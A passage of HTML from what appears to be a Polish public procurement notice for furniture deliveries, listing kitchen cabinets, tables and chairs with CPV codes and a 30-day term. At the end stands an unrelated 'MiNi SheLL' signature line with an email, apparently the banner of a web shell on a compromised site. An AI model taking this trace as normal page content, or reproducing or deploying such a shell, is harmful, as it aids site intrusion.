biblioteczna-1.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8, 39.14.31.10-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie ofertowe nr 3- dostawa mebli kuchennych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa mebli kuchennych wyszczególnionych poniżej: (szczegółowy opis mebli kuchennych stanowi Załącznik nr 2.3 do SIWZ).1.Szafka stojąca z szufladą 1, (wym. 60 cm × 85 cm × 60-65)- 2 szt.;2.Szafka stojąca z szufladą 2,(wym. 80 cm × 85 cm × 60-65)- 2 szt.;3.Szafka pod zlewozmywak-3 szt.;4.Szafka wisząca 1, (wym. 80 cm × 70-75 cm × 35-40)- 2 szt.;5.Szafka wisząca, (do zamontowania okapu kuchennego)- 3 szt.;6.Szafka wisząca na suszarkę-3 szt.;7.Szafka wisząca 2, (wym. 60 cm × 70-75 cm × 35-40)-2 szt.;8.Stół kuchenny (rozkładany)- 3 szt.;9.Krzesło do stołu kuchennego-6 szt.;10.Narożnik kuchenny wyściełany-2 szt.;.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8, 39.14.10.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com